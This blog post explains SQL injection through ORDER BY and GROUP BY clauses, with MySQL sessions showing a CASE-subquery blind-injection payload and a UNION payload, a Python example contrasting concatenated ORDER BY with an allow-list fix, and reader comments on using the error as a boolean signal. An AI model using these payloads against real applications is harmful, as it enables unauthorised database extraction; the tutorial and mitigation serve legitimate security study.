Injection in Order by, Group by Clause

Exploiting SQL injection when the user's input lands in the ORDER BY clause is a bit tricky, because UNION queries are not permitted after ORDER BY. The following can be used in such a scenario to turn it into a blind SQL injection, where the query either succeeds or raises an error depending on the truth of the injected condition:

mysql> select id from news where id =1 order by 1, (select case when (1=1) then 1 else 1*(select table_name from information_schema.tables) end)=1;
+------+
| id   |
+------+
|    1 |
+------+
1 row in set (0.00 sec)

----

mysql> select id from news where id =1 order by 1, (select case when (1=2) then 1 else 1*(select table_name from information_schema.tables) end)=1;
ERROR 1242 (21000): Subquery returns more than 1 row

----

For injections where the user's input goes into the GROUP BY clause, UNION queries can be used, although the technique above will also work for blind injection:

mysql> select id from news where id =1 group by id union select 2222;
+------+
| id   |
+------+
|    1 |
| 2222 |
+------+
2 rows in set (0.00 sec)
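The reason ORDER BY and GROUP BY injections keep appearing is that column names cannot be bound as prepared-statement parameters, so developers fall back to string concatenation. The following is an added example, not code from the original post: it shows that vulnerable pattern beside the standard mitigation, an allow-list that maps the request value onto a fixed identifier. The `news` table, its rows and the function names are constructed for the example.

```python
import sqlite3

# Constructed sample data standing in for the post's `news` table.
SAMPLE_ROWS = [(1, "b-post", "2010-07-01"), (2, "a-post", "2010-07-02")]

# Only these request values may reach ORDER BY; each maps to a fixed identifier.
SORTABLE_COLUMNS = {"id": "id", "title": "title", "published": "published_at"}
DIRECTIONS = {"asc": "ASC", "desc": "DESC"}


def build_query_vulnerable(sort: str, direction: str = "asc") -> str:
    """The 'before' pattern: request input concatenated straight into ORDER BY.
    Whatever the client sends (including a CASE/subquery fragment as in the
    post) becomes part of the executed statement."""
    return f"SELECT id FROM news ORDER BY {sort} {direction}"


def build_query_hardened(sort: str, direction: str = "asc") -> str:
    """Allow-list lookup: the request value is a dictionary key, never SQL text.
    Anything outside the mapping is rejected before a query is even formed."""
    try:
        column = SORTABLE_COLUMNS[sort]
        order = DIRECTIONS[direction.lower()]
    except KeyError:
        raise ValueError(f"unsupported sort parameter: {sort!r}/{direction!r}") from None
    return f"SELECT id FROM news ORDER BY {column} {order}"


def sort_param_accepted(sort: str, direction: str = "asc") -> bool:
    """True if the hardened builder would accept this sort/direction pair."""
    try:
        build_query_hardened(sort, direction)
        return True
    except ValueError:
        return False


def fetch_ids_sorted(sort: str, direction: str = "asc") -> list:
    """Run the hardened query against an in-memory SQLite copy of the sample table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER, title TEXT, published_at TEXT)")
    conn.executemany("INSERT INTO news VALUES (?, ?, ?)", SAMPLE_ROWS)
    rows = conn.execute(build_query_hardened(sort, direction)).fetchall()
    conn.close()
    return [row[0] for row in rows]


if __name__ == "__main__":
    print(fetch_ids_sorted("title"))          # ordering by the mapped column
    print(sort_param_accepted("1, (select 1)"))  # False: not a known key
```

The same lookup-table approach applies to a GROUP BY column taken from the request; the check belongs in the application, not in a database-side filter.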

6 Thoughts on “Injection in Order by, Group by Clause”

  1. Great. That's exactly what I was searching for.
    Not so great: I do not understand what the example should do…

  2. What version of MySQL are you trying this on?

    I think this does not work in some of the recent versions.

  3. Server Version: 5.1.30
    I meant especially the “order by”-case.
    What happens is exactly the shown reaction. What does that error tell me (regarding the injection)?

  4. This is how you can convert this into standard true and false responses. Think of that error as a ‘false’ response, which you get when doing boolean injection;

    e.g. id=100 and 1=1; id=100 and 1=2;

    ----

  5. of course -.-’
    Thank you.

  6. GDSG on July 8, 2010 at 2:17 am said:

    THANKS MAN!!!
    I tried to figure this out for about 2 days, because IF(1=1,1,1) did not work, but this ROCKS.

    Thanks Again!
